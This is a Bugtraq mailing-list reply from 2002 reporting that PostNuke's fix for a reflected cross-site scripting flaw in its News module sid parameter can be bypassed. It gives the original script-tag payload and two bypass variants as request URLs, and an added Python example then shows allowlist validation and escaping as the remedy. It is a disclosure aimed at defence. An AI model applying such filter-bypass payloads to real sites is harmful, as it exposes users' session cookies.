[27262] in bugtraq
Re: Postnuke XSS fixed
daemon@ATHENA.MIT.EDU (Daniel Woods)
Wed Oct 2 18:52:31 2002
Date: Wed, 2 Oct 2002 10:09:33 -0600 (MDT)
From: Daniel Woods <dwoods@ucalgary.ca>
To: bugtraq@securityfocus.com
In-Reply-To: <20021002041021.1E4EA3ABE@sitemail.everyone.net>
Message-ID: <Pine.A41.4.44.0210021005060.36474-100000@acs4.acs.ucalgary.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Humm!
> on 26th Sep the following url:
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
> used to give Alert PopUp and
> Error:
> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
> at line 23
>
> now it gives:
> Sorry - $HTTP_GET_VARS contains javascript...
>
> Prompt fix by PostNuke team, great work Keep it up! :)
Not so fast on the praise :(
It only took me a couple of workarounds to find ways to bypass the check.
http://news.postnuke.com/modules.php
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
Using the request...
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
gives me the DB Error: message
And using the request...
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
Thanks... Dan.
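As an added illustration (not code from PostNuke or from anyone in this thread), the Python below models the three requests above against an assumed substring blacklist and shows the two controls that would have closed both problems: validating sid as an integer before it reaches SQL, and HTML-encoding anything that is echoed back. The filter naive_filter(), the helpers get_sid(), parse_sid() and render_error(), and the query strings are constructed for this example; the actual check PostNuke shipped is not visible in the thread, so the stand-in only reproduces the reported behaviour (rejects the literal "<script>", lets "<script >" and "<\script>" through).

```python
"""Added example, not PostNuke code: why a blacklist for the literal
string "<script>" is bypassable, and what to do instead.

Assumption: the filter PostNuke added is modelled as a case-insensitive
substring match on "<script>" (naive_filter below). That matches the
thread: "<script>" is rejected, "<script+>" (decoded to "<script >") and
"<\script>" are not.
"""
import html
import re
from urllib.parse import unquote_plus

# Constructed query strings, modelled on the requests in the thread.
ORIGINAL = "op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>"
PLUS_BYPASS = "op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>"
BACKSLASH_BYPASS = "op=modload&name=News&file=article&sid=<\\script>alert(document.cookie);</script>"


def get_sid(query_string: str) -> str:
    """Return the decoded sid parameter the way PHP fills $HTTP_GET_VARS:
    '+' becomes a space and %xx sequences are decoded before any check runs."""
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        if key == "sid":
            return unquote_plus(value)
    return ""


def naive_filter(value: str) -> bool:
    """Assumed blacklist: True means 'reject the request'.  It only knows the
    exact spelling "<script>", so "<script >" (HTML still treats this as a
    script tag) and "<\\script>" (not a tag, but still not a valid id) pass."""
    return "<script>" in value.lower()


def blacklist_result(query_string: str) -> str:
    """Outcome of the blacklist approach for one raw query string."""
    return "blocked" if naive_filter(get_sid(query_string)) else "passed to SQL and page"


def parse_sid(value: str):
    """Allowlist validation: sid is an article id, so accept only a short
    decimal integer.  Returns the int, or None for anything else.  With this
    in front of the query the 'DB Error: getArticles: 1064' cannot occur."""
    return int(value) if re.fullmatch(r"[0-9]{1,10}", value) else None


def render_error(value: str) -> str:
    """If untrusted input must be echoed (e.g. in an error message), encode it
    so '<', '>', '&' and quotes cannot form markup, whatever spelling was used."""
    return "Unknown article id: " + html.escape(value, quote=True)


if __name__ == "__main__":
    for label, qs in (("original", ORIGINAL), ("plus", PLUS_BYPASS), ("backslash", BACKSLASH_BYPASS)):
        sid = get_sid(qs)
        verdict = "accepted" if parse_sid(sid) is not None else "rejected"
        print(f"{label:9s} sid={sid!r}")
        print(f"{'':9s} blacklist: {blacklist_result(qs)}; allowlist: {verdict}")
        print(f"{'':9s} safe echo: {render_error(sid)}")
```

Running it shows the blacklist rejecting only the first request while parse_sid() rejects all three and render_error() turns every variant into inert text. The point is the one the thread makes implicitly: the fix belongs on the sink (typed validation before SQL, encoding before HTML), not in a list of bad strings.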